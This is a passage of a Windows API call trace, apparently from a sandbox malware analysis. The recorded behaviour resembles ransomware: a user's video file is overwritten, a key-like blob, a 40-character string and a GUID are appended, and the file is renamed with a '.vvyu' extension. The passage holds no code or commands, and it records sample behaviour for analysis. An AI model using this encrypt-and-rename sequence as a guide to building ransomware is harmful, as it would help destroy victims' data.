[0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0195.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d38 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d98 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2db0 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d50 [0195.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d20 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0195.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0195.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0195.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.753] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xdcf8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xdcf8, lpOverlapped=0x0) returned 1 [0195.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.754] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xdcfd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.754] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0195.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0195.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.756] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0195.756] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.756] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.756] CloseHandle (hObject=0x568) returned 1 [0195.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0195.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.758] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\9eCWyh_E3fHJU.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\9ecwyh_e3fhju.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\9eCWyh_E3fHJU.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\9ecwyh_e3fhju.avi.vvyu")) returned 1 [0195.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.760] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.762] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x407eb340, ftCreationTime.dwHighDateTime=0x1d8983a, ftLastAccessTime.dwLowDateTime=0x182d2600, ftLastAccessTime.dwHighDateTime=0x1d8a213, ftLastWriteTime.dwLowDateTime=0x182d2600, ftLastWriteTime.dwHighDateTime=0x1d8a213, nFileSizeHigh=0x0, nFileSizeLow=0xdcfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9eCWyh_E3fHJU.avi", cAlternateFileName="9ECWYH~1.AVI")) returned 0 [0195.762] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.763] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.763] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 